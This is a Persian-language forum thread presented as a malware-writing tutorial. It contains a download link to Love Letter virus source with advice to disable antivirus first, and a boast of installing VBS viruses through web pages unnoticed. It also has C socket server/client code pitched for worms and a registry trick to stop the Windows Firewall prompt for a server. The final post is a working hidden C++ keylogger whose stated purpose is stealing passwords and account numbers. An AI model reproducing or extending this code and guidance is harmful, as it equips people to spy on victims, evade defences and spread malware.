آموزش بد افزار نویسی!؟!

نقل قول:

---

نوشته شده توسط !Plus [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]

از رو چه حسابی به این حرفت رسیدی...؟ :13:

فروم رو به خاطر یه تاپیک مربوط به شیمی فیلتر کردن...!

چند روز پیش فقط همون یه دونه فیلتر بود... فرداش زدن کل فروم رو فیلتر کردن...!

بعد هم اون تاپیک حذف شد...! حیف... تاپیک خیلی جالبی بود...!

---

خب پس حالا ادامه بده :31:
راستی اون تایپیک شیمی مگه محتویاتش چی بود؟ :20:

نقل قول:

---

راستی اون تایپیک شیمی مگه محتویاتش چی بود؟

---

دقیقاً مطمءن نیستم که به خاطر اون بوده باشه...!

ولی به خاطر همونه...! :دی

چند روز پیش زدن اون تاپیک رو ، روی P30World.ir هیلتر کردن...!

بعد هم زدن تاپیک رو حذف کردن...!

فرداش اومدن زدن کل فروم رو هیلتر کردن...!

بعد هم لابد می خوان کل فروم رو حذف کنن...! :دی

تاپیکش مربوط میشد به ساخت بمب و آزمایش های جالب شیمی...!

لابد گفتن اگه همین جوری پیش بره میرسه به ساختن بمب اتم و موشک قاره پیما و... و زدن هیلترش کردن...!

دوستان چرا این برنامه بد افزارو ادامه نمیدید ؟؟؟

سلام به همه دوستان...! :20:

دوباره برگشتم تا ادامه بدیم...! :10:

اول سورس یه ویروس رو براتون می ذارم که با VBS نوشته شده...!

بعد هم شروع می کنم به آموزش VBS ...!

لینک دانلود ویروس Love_Letter...! :

کد:

---

http://www.irfreeup.com/images/08yiz560kd8wdnkz3niz8.zip

---

پسورد فایل : www.p30world.com

توجه : قبل از این که ویروس رو از حالت فشرده خارج کنید...! آنتی ویروستون رو غیر فعال کنید... تا ویروس رو پاک نکنه...!

توجه : به هیچ وجه ویروس رو اجرا نکنید...! اگر هم به اشتباه این کار رو کردید...! حتماً یه بار سیستم تون رو اسکن کنید...!

بعد از این که ویروس رو از حالت فشرده خارج کردید...! برنامه Notepad رو اجرا کنید و از منوی برنامه گزینه Open رو بزنید و فایل ویروس رو انتخاب کنید تا سورسش نشون داده بشه...!

آموزش رو از پست بعد شروع می کنیم...! :20:

موفق باشید...! :46:

فعلاً...! ;)

دوستان از این پست به بعد آموزش برنامه نویسی VBScript رو شروع می کنیم...! :27:

VBScript یه زبان اسکریپت نویسی قدرتمند از طرف ماکروسافت ه...! به این زبان برنامه نویسی قاتل جاوا اسکریپت هم می گن...! چون همون کار جاوا اسکریپت رو انجام میده... ولی بسیار ساده تر از جاوا اسکریپت ه...!

این زبان برنامه نویسی از ویژوال بیسیک مشتق شده ولی... خیلی از قسمت های ویژوال بیسیک رو نداره...! و خیلی از VB راحت تره...!

توی آموزش ها ما این طور فرض می کنیم که شما با VB آشنایی نسبتاً کاملی دارید...!

قصد ما نوشتن بدافزار ه پس کاربرد و VBS توی صفحات وب و... رو میذاریم کنار...! بیشتر رو قسمت ActiveX ها و...! (به خصوص اشیاء و تابع CreateObject که دسترسی کامل کامپیوتر ما میده...! :21: ) کار می کنیم...!

از پست بعدی آموزش رو شروع می کنیم...! :20:

در ابتدا نقاط اشتراک و تفاوت های این دو زبان رو بررسی می کنیم و بعد از اون وارد بحث اصلی خودمون می شیم...!
(یعنی همون بدافزار نویسی...! :21:)

VBS رو دست کم نگیرید...! بعداً سورس کد های بیشتری براتون میذارم تا قدرت این زبان اسکریپت نویسی رو درک کنید...! ورم ها و ویروس های زیادی با این زبان نوشته شدن...! :21:

البته این رو هم بگم که تمام سعی ماکروسافت رو این بود که امنیت این زبان اسکریپت نویسی بالا بره ولی...! حتی قسمت هایی از ویژوال بیسیک که حذف شده... به خاطر همین موضوع امنیت بوده...! :27:

فعلاً بای...! :46:

دوست عزیز برای یه آموزش چقدر پست میدی لطفا تو هر پست آموزش رو بدید

سلام

دستت درد نکنه امیرمحمد جان. من یه منبع خوب سراغ دارم میتونی برای آموزش هات ازشون استفاده کنی.

اگر کسی مایل بود میتونه خودش کتاب ها رو بخونه:

کد:

---

http://www.ashiyane.org/forums/showthread.php?t=22716

---

به نظرم که خیلی خوب داره کار می کنه.

این هم آموزشش تو HTML :

کد:

---

http://dl.irpdf.com/CD4/(1908).zip

---

توضیحات:

کد:

---

http://www.ashiyane.org/forums/showpost.php?p=121171&postcount=1

---

آقا پسورد آموزش تو HTML چیه؟!

نقل قول:

---

دوست عزیز برای یه آموزش چقدر پست میدی لطفا تو هر پست آموزش رو بدید

---

ممنون از اين كه تذكر داديد...! :11:
تا جايي كه بتونم مطالب رو تو يه پست مي نويسيم...! :20:
ولي... نميشه همه رو يكي كرد...!حجمش زياد ميشه و توي تايپ كردنش به مشكل برمي خورم...! يه كم سخت ميشه...! :13:

نقل قول:

---

دستت درد نکنه امیرمحمد جان. من یه منبع خوب سراغ دارم میتونی برای آموزش هات ازشون استفاده کنی.

---

ممنون مرتضي جان...! چيز هاي خوبيه اما...! من ميانه خوبي با اين گروه لاشيانه ندارم...! :41:

تو 24 ساعت سايت شون دوبار Deface شد...!؟!:38: اونوقت ميان حرف از امنيت مي زنن و كلاس هاي آموزشي مي ذارن و...! :31:

سايتي كه با پول بشه توش ستاره خريد ارزش پست دادن و وقت گذاشتن نداره...! :2:

من دوست دارم به جاي اين كه منابع مطالب P30World سايت ديگه اي باشه...! منابع سايت هاي ديگه P30World باشه...!:43:

به خاطر همين همه مطالب رو از خودم ميذارم...! :27:

از همه دوستان ممنونم...! :40:

فعلاً... باي...! :46:

نميشه با برنامه نويسي مثل ++c يا C# و دلفي بگذارين ؟ بعد يك چيزي ديگه چرا فايل ويروس را دانلود كنيم همينجا سورس را بگذار ديگه . ممنون [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]

نقل قول:

---

نوشته شده توسط RatAtouille [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]

نميشه با برنامه نويسي مثل ++c يا C# و دلفي بگذارين ؟ بعد يك چيزي ديگه چرا فايل ويروس را دانلود كنيم همينجا سورس را بگذار ديگه . ممنون [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]

---

سی شارپ که اصلاً به درد ویروس نویسی نمی خوره...! چون NET Framework. می خواد...! :2:

ولی C و ++C رو بعداً براتون سورس میذارم...! :27:

فعلاً با همون VBS کار می کنیم...! چون هم ساده است و درک کد هاش راحته... و هم OpenSource ه و هم میشه تو ضفحات وب ازش استفاده کرد و ویروس رو بدون این که قربانی بازدید کننده بفهمه... رو کامپیوترش نصب کرد...! :21:

چند تا سورس اسمبلی هم دارم...! از این ویروس هایی که رو سخت افزار رژه میره...! :21: اونا رو هم بعداً براتون میذارم...! :27:

راستی...! چرا فقط من دارم مطلب آموزشی میذارم...! چرا بقیه هیچ کمکی نمی کنند...؟ :13:

موفق باشید...! :46:

فعلاً بای...! :40:

حتما با c++ و Borland Delphi 7 يادت نره .

اینم از طرف بنده امیدوارم که در ارتقای سطح علمی دوستان موثر باشه :
سورس کد یک SERVER/RECIVER به زبان C (تو پست بعدی SENDER/CLIENT رو هم میزارم)
این سورس جنبه آموزشی داره و هیچ خطری برای سیستم ندارد.
از این تکنیک برای ساخت کرم ها و ویروسهایی که قابلیت بر قراری ارتباط در شبکه را دارند استفاده میشود.
البته هر SERVER/RECIVER برای برقراری ارتباط کامل عملا به یک SENDER/CLIENT نیاز داره که سورس آموزشی اونو هم میزارم.
برای درک بهتر این سورس نیاز به کمی تسلط بر زبان C میباشد
هر سوالی مربوط به این سورس کد داشتید درخدمتم.
ممکنه به علت برخی از محدودیت ها در ارسال پست سورس کد دچار چند اشکال تحریری شده باشه که براحتی میتونید در محیط VS اونو درست کنید

کد:

---

#include

<winsock2.h>

#include

<stdio.h>

// A sample of the select() return value
int

recvTimeOutTCP(SOCKET socket, long sec, long usec)

{

// Setup timeval variable
struct timeval

timeout;

struct fd_set

fds;

// assign the second and microsecond variables
timeout.tv_sec = sec;
timeout.tv_usec = usec;
// Setup fd_set structure
FD_ZERO(&fds);
FD_SET(socket, &fds);
// Possible return values:
// -1: error occurred
// 0: timed out
// > 0: data ready to be read
return select

(0, &fds, 0, 0, &timeout);

}

int

main(int argc, char **argv)

{
WSADATA wsaData;
SOCKET ListeningSocket, NewConnection;
SOCKADDR_IN ServerAddr, SenderInfo;

int

Port = 7171;

// Receiving part
char

recvbuff[1024];

int

ByteReceived, i, nlen, SelectTiming;

// Initialize Winsock version 2.2
if

(WSAStartup(MAKEWORD(2,2), &wsaData) != 0)

{

// The WSAGetLastError() function is one of the only functions
// in the Winsock 2.2 DLL that can be called in the case of a WSAStartup failure
printf(

"Server: WSAStartup failed with error %ld.\n", WSAGetLastError());

// Exit with error
return

1;

}

else
{
printf(

"Server: The Winsock DLL found!\n");

printf(

"Server: The current status is %s.\n" , wsaData.szSystemStatus);

}

if

(LOBYTE(wsaData.wVersion) != 2 || HIBYTE(wsaData.wVersion) != 2 )

{

//Tell the user that we could not find a usable WinSock DLL
printf(

"Server: The dll do not support the Winsock version %u.%u!\n" ,

LOBYTE(wsaData.wVersion),HIBYTE(wsaData.wVersion));

// Do the clean up
WSACleanup();
// and exit with error
return

1;

}

else
{
printf(

"Server: The dll supports the Winsock version %u.%u!\n" , LOBYTE(wsaData.wVersion),

HIBYTE(wsaData.wVersion));
printf(

"Server: The highest version this dll can support is %u.%u\n" ,

LOBYTE(wsaData.wHighVersion), HIBYTE(wsaData.wHighVersion));
}

// Create a new socket to listen for client connections.
ListeningSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
// Check for errors to ensure that the socket is a valid socket.
if

(ListeningSocket == INVALID_SOCKET)

{
printf(

"Server: Error at socket(), error code: %ld.\n", WSAGetLastError());

// Clean up
WSACleanup();
// and exit with error
return

1;

}

else
printf(

"Server: socket() is OK!\n");

// Set up a SOCKADDR_IN structure that will tell bind that we
// want to listen for connections on all interfaces using port 7171.
// The IPv4 family
ServerAddr.sin_family = AF_INET;
// host-to-network byte order
ServerAddr.sin_port = htons(Port);
// Listen on all interface, host-to-network byte order
ServerAddr.sin_addr.s_addr = htonl(INADDR_ANY);
// Associate the address information with the socket using bind.
// Call the bind function, passing the created socket and the sockaddr_in
// structure as parameters. Check for general errors.
if

(bind(ListeningSocket, (SOCKADDR *)&ServerAddr, sizeof(ServerAddr)) == SOCKET_ERROR)

{
printf(

"Server: bind() failed! Error code: %ld.\n", WSAGetLastError());

// Close the socket
closesocket(ListeningSocket);
// Do the clean up
WSACleanup();
// and exit with error
return

1;

}

else
printf(

"Server: bind() is OK!\n");

// Listen for client connections with a backlog of 5
if

(listen(ListeningSocket, 5) == SOCKET_ERROR)

{
printf(

"Server: listen(): Error listening on socket %ld.\n", WSAGetLastError());

// Close the socket
closesocket(ListeningSocket);
// Do the clean up
WSACleanup();
// Exit with error
return

1;

}

else
printf(

"Server: listen() is OK, I'm listening for connections...\n" );

// Set 10 seconds 10 useconds timeout
SelectTiming = recvTimeOutTCP(ListeningSocket, 10, 10);
switch

(SelectTiming)

{

case

0:

// Timed out, do whatever you want to handle this situation
printf(

"\nServer: Timeout lor while waiting you retard client!...\n" );

break

;

case

-1:

// Error occurred, more tweaking here and the recvTimeOutTCP()...
printf(

"\nServer: Some error encountered with code number: %ld\n", WSAGetLastError());

break

;

default

:

{

// Accept a new connection when available. 'while' always true
while

(1)

{

// Reset the NewConnection socket to SOCKET_ERROR
// Take note that the NewConnection socket in not listening
NewConnection = SOCKET_ERROR;
// While the NewConnection socket equal to SOCKET_ERROR
// which is always true in this case...
while

(NewConnection == SOCKET_ERROR)

{

// Accept connection on the ListeningSocket socket and assign
// it to the NewConnection socket, let the ListeningSocket
// do the listening for more connection
NewConnection = accept(ListeningSocket, NULL, NULL);
printf(

"\nServer: accept() is OK...\n");

printf(

"Server: New client got connected, ready to

receive and send data...\n"

);

// At this point you can do two things with these sockets
// 1. Wait for more connections by calling accept again
// on ListeningSocket (loop)
// 2. Start sending or receiving data on NewConnection.
ByteReceived = recv(NewConnection, recvbuff,

sizeof(recvbuff), 0);

// When there is data
if

( ByteReceived > 0 )

{
printf(

"Server: recv() looks fine....\n");

// Some info on the receiver side...
getsockname(ListeningSocket, (SOCKADDR *)&ServerAddr,
(

int *)sizeof(ServerAddr));

printf(

"Server: Receiving IP(s) used: %s\n",

inet_ntoa(ServerAddr.sin_addr));
printf(

"Server: Receiving port used: %d\n", htons(ServerAddr.sin_port));

// Some info on the sender side
// Allocate the required resources
memset(&SenderInfo, 0,

sizeof(SenderInfo));

nlen =

sizeof(SenderInfo);

getpeername(NewConnection, (SOCKADDR *)&SenderInfo, &nlen);
printf(

"Server: Sending IP used: %s\n", inet_ntoa(SenderInfo.sin_addr));

printf(

"Server: Sending port used: %d\n", htons(SenderInfo.sin_port));

// Print the received bytes. Take note that this is the total
// byte received, it is not the size of the declared buffer
printf(

"Server: Bytes received: %d\n", ByteReceived);

// Print what those bytes represent
printf(

"Server: Those bytes are: \"");

// Print the string only, discard other
// remaining 'rubbish' in the 1024 buffer size
for

(i=0;i < ByteReceived;i++)

printf(

"%c", recvbuff[i]);

printf(

"\"");

}

// No data
else if

( ByteReceived == 0 )

printf(

"Server: Connection closed!\n");

// Others
else
printf(

"Server: recv() failed with error code: %d\n" , WSAGetLastError());

}

// Clean up all the send/recv communication, get ready for new one
if

( shutdown(NewConnection, SD_SEND) != 0)

printf(

"\nServer: Well, there is something wrong with the

shutdown(). The error code: %ld\n"

, WSAGetLastError());

else
printf(

"\nServer: shutdown() looks OK...\n");

// Well, if there is no more connection in 15 seconds,
// just exit this listening loop...
if

( recvTimeOutTCP(ListeningSocket, 15, 0) == 0)

break

;

}
}
}
printf(

"\nServer: The listening socket is timeout...\n");

// When all the data communication and listening finished, close the socket
if

(closesocket(ListeningSocket) != 0)

printf(

"Server: Cannot close \"ListeningSocket\" socket. Error code: %ld\n" , WSAGetLastError());

else
printf(

"Server: Closing \"ListeningSocket\" socket...\n");

// Finally and optionally, clean up all those WSA setup
if

(WSACleanup() != 0)

printf(

"Server: WSACleanup() failed! Error code: %ld\n", WSAGetLastError());

else
printf(

"Server: WSACleanup() is OK...\n");

return

0;
}

---

فقط برای کامپایل در VS باید تنظیمات زیرو انجام بدید
به بخش Propertis پروژه برید و این عملیاتو انجام بدید.
به بخش Advanced از شاخه ++C/C بروید و گزینه Compile As رو به Compile as C Code تغییر بدید.
به بخش Input از شاخه Linker بروید و در قسمت Additional Dependencies کلمه ws2_32.lib را اضافه کنید.
اگر تنظیماتو به درستی انجام بدید بعد کامپایل و اجرای پروژه پنجره مربوط به FireWall باز میشه.
موفق باشید.

اینم سورس یک SENDER/CLIENT که برای کامپایل باید تنظیمات نوشته شده در پست قبلیو انجام بدید.
در این رابطه هم اگر سوالی داشتید بپرسید.

کد:

---

#include

<winsock2.h>

#include

<stdio.h>

int

main(int argc, char **argv)
{
WSADATA wsaData;
SOCKET SendingSocket;

// Server/receiver address

SOCKADDR_IN ServerAddr, ThisSenderInfo;

// Server/receiver port to connect to

unsigned int

Port = 7171;

int

RetCode;

// Be careful with the array bound, provide some checking mechanism...

char

sendbuf[1024] = "This is a test string from sender";

int

BytesSent, nlen;

// Initialize Winsock version 2.2

WSAStartup(MAKEWORD(2,2), &wsaData);
printf(

"Client: Winsock DLL status is %s.\n" , wsaData.szSystemStatus);

// Create a new socket to make a client connection.
// AF_INET = 2, The Internet Protocol version 4 (IPv4) address family,
TCP protocol

SendingSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

if

(SendingSocket == INVALID_SOCKET)
{
printf("Client: socket() failed! Error code: %ld\n" ,
WSAGetLastError());

// Do the clean up

WSACleanup();

// Exit with error

return

-1;
}

else

printf(

"Client: socket() is OK!\n");

// Set up a SOCKADDR_IN structure that will be used to connect
// to a listening server on port 5150. For demonstration
// purposes, let's assume our server's IP address is 127.0.0.1 or
localhost
// IPv4

ServerAddr.sin_family = AF_INET;

// Port no.

ServerAddr.sin_port = htons(Port);

// The IP address

ServerAddr.sin_addr.s_addr = inet_addr(

"127.0.0.1");

// Make a connection to the server with socket SendingSocket.

RetCode = connect(SendingSocket, (SOCKADDR *) &ServerAddr,

sizeof

(ServerAddr));

if

(RetCode != 0)
{
printf("Client: connect() failed! Error code: %ld\n",
WSAGetLastError());

// Close the socket

closesocket(SendingSocket);

// Do the clean up

WSACleanup();

// Exit with error

return

-1;
}

else

{
printf(

"Client: connect() is OK, got connected...\n");
printf("Client: Ready for sending and/or receiving data...\n" );
}

// At this point you can start sending or receiving data on
// the socket SendingSocket.
// Some info on the receiver side...

getsockname(SendingSocket, (SOCKADDR *)&ServerAddr, (

int

*)

sizeof(ServerAddr));
printf("Client: Receiver IP(s) used: %s\n",
inet_ntoa(ServerAddr.sin_addr));
printf("Client: Receiver port used: %d\n", htons(ServerAddr.sin_port));

// Sends some data to server/receiver...

BytesSent = send(SendingSocket, sendbuf, strlen(sendbuf), 0);

if

(BytesSent == SOCKET_ERROR)
printf("Client: send() error %ld.\n", WSAGetLastError());

else

{
printf(

"Client: send() is OK - bytes sent: %ld\n" , BytesSent);

// Some info on this sender side...
// Allocate the required resources

memset(&ThisSenderInfo, 0,

sizeof(ThisSenderInfo));
nlen = sizeof(ThisSenderInfo);
getsockname(SendingSocket, (SOCKADDR *)&ThisSenderInfo, &nlen);
printf("Client: Sender IP(s) used: %s\n",
inet_ntoa(ThisSenderInfo.sin_addr));
printf("Client: Sender port used: %d\n",
htons(ThisSenderInfo.sin_port));
printf("Client: Those bytes represent: \"%s\"\n", sendbuf);
}

if

( shutdown(SendingSocket, SD_SEND) != 0)
printf("Client: Well, there is something wrong with the shutdown().
The error code: %ld\n", WSAGetLastError());

else

printf(

"Client: shutdown() looks OK...\n");

// When you are finished sending and receiving data on socket
SendingSocket,
// you should close the socket using the closesocket API. We will
// describe socket closure later in the chapter.

if

(closesocket(SendingSocket) != 0)
printf("Client: Cannot close \"SendingSocket\" socket. Error code:
%ld\n", WSAGetLastError());

else

printf(

"Client: Closing \"SendingSocket\" socket...\n");

// When your application is finished handling the connection, call
WSACleanup.

if

(WSACleanup() != 0)
printf("Client: WSACleanup() failed!...\n");

else

printf(

"Client: WSACleanup() is OK...\n");

return

0;

}

---

برای استفاده از دو برنامه اول SERVER رو اجرا کرده و سپس CLIENT رو اجرا کنید تا از صحت کار با خبر بشید.

یه مطلبی که مر تبط با 2 تا پست قبلی هم هست میخوام بگم و اونم از کار انداختن FireWall ویندوز هست.
این روش کاملا ساده هست فقط باید یه تغییراتی در رجیستری صورت بدید.
به این آدرس برید:

کد:

---

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]

---

یک مقدار از نوع REG_SZ درست کنید و آدرس فایل سرور را در آن وارد کنید.
با این کار زمان اجرای سرور FireWall ویندوز باز نخواهد شد.
موفق باشید.

نقل قول:

---

نوشته شده توسط god of war 2 [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]

یه مطلبی که مر تبط با 2 تا پست قبلی هم هست میخوام بگم و اونم از کار انداختن FireWall ویندوز هست.
این روش کاملا ساده هست فقط باید یه تغییراتی در رجیستری صورت بدید.
به این آدرس برید:

کد:

---

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]

---

یک مقدار از نوع REG_SZ درست کنید و آدرس فایل سرور را در آن وارد کنید.
با این کار زمان اجرای سرور FireWall ویندوز باز نخواهد شد.
موفق باشید.

---

این قدیمی بود...! :13:

ولی ممنون...! :11:

اگه راست میگی... FireWall ByPass بذار...! :27:

نقل قول:

---

این قدیمی بود...!

---

شاید برای یکی تازگی داشته باشه.

نقل قول:

---

اگه راست میگی... FireWall ByPass بذار...!

---

فکر نمیکنم این مطلب زیاد بدرد اینجا (آموزش بدافزار نویسی) بخوره!!
و مهمتر از اون اینه که توضیح و آموزش این مطلب از وقت و حوصله بنده خارج هست.
ولی تو نت لینک آموزشی زیاد داره.
نوبتی هم که باشه نوبت شماست که یه مطلب بزاری:10:
موفق باشید.

به نام خدا.
سلام.چند روزی بود که نمیتونستم به اینجا سر بزنم و الان هم میبینم که هیچکس هیچ پستی نداده و تاپیک خیلی قدیمی شده.
تصمیم گرفتم که یه مطلب کوچیک بزارم و امیدوارم که مفید باشه.
مطلبی که میخوام بزارم مربوط میشه به یک KeyLogger که در اکثر ویروس ها و یا تروجان ها از این متود استفاده میشه(بیشتر برای بدست آوردن رمزهای عبور و شماره های حساب و .... که توسط کاربر استفاده میشه و فرستادن اونها برای نویسنده ویروس)
KeyLogger ها همانطور که از اسمشون معلومه تمام کلید هایی که فشرده میشه توسط کاربر در طول کار با سیستمو ذخیره میکنه.
این هم یک نمونه ساده از سورس این برنامه به همراه کامنت فارسی(زبان ++C):

کد:

---


#include<windows.h>
#include<WinBase.h>
#include<string>
#include<fstream>
usingnamespace std;
string GetKey(int Key){
string KeyString ="";
　
/*مقدار رشته ای جایگزین شونده ارزش عددی کلیدها*/
if(Key ==8) KeyString ="[delete/back]";
elseif(Key ==13) KeyString ="\n";
elseif(Key ==32) KeyString =" ";
elseif(Key == VK_PAUSE) KeyString ="[PAUSE]";
elseif(Key == VK_CAPITAL) KeyString ="[CAPITAL]";
elseif(Key == VK_SHIFT) KeyString ="[SHIFT]";
elseif(Key == VK_TAB) KeyString ="[TAB]";
elseif(Key == VK_CONTROL) KeyString ="[CTRL]";
elseif(Key == VK_ESCAPE) KeyString ="[ESCAPE]";
elseif(Key == VK_END) KeyString ="[END]";
elseif(Key == VK_HOME) KeyString ="[HOME]";
elseif(Key == VK_LEFT) KeyString ="[align=left]";
elseif(Key == VK_RIGHT) KeyString ="[align=right]";
elseif(Key == VK_UP) KeyString ="[UP]";
elseif(Key == VK_DOWN) KeyString ="[DOWN]";
elseif(Key == VK_SNAPSHOT) KeyString ="[SNAPSHOT]";
elseif(Key == VK_NUMLOCK) KeyString ="[NUMLOCK]";
elseif(Key ==190|| Key ==11) KeyString =".";
elseif(Key >=96&& Key <=105) KeyString = Key-48;
elseif(Key >47&& Key <60) KeyString = Key;
if(Key != VK_LBUTTON || Key != VK_RBUTTON){
if(Key >64&& Key <91){
if(GetKeyState(VK_CAPITAL)) KeyString = Key;
else{
Key = Key +32;
KeyString = Key;
}
}
}
return KeyString;
}
int main(){
// مخفی کردن برنامه
AllocConsole();
HWND hidden = FindWindowA("ConsoleWindowClass",NULL);
ShowWindow(hidden,0);
// ایجاد دایرکتوری مورد نظر برای ذخیره کلیدهای فشرده شده
CreateDirectory((LPCSTR)"c:\\MyTemp", NULL);
// باز کردن فایل برای ذخیره اطلاعات در آن
string file ="c:\\MyTemp\\log.txt";
fstream fout;
fout.open(file.c_str(), std::fstream::out | std::fstream::app);
// شروع عملیات
string currentKey ="";
while(true){
Sleep(5);
for(int i =8; i <191; i++){
if(GetAsyncKeyState(i)&1==1){
currentKey = GetKey (i);
fout.write(currentKey.c_str(), currentKey.size());
fout.close();
fout.open(file.c_str(), fstream::out | fstream::app);
}
}
}
}


---

روش کارش هم به اینصورته که اول یک فایل به نام Log.txt در این آدرس C:\MyTemp\ ایجاد میکنه و تمام کلید های فشرده شده توسط کاربرو داخل این فایل ذخیره میکنه.
برای بدست آوردن کلید ها هم از تابع GetAsyncKeyState استفاده میکنه.
اگر سوالی هم داشتید در خدمتم.
اگر وقت کنم تو پست های بعدی ShellCoding و روش های ایجاد و استفاده از اونو میگم.
موفق باشید.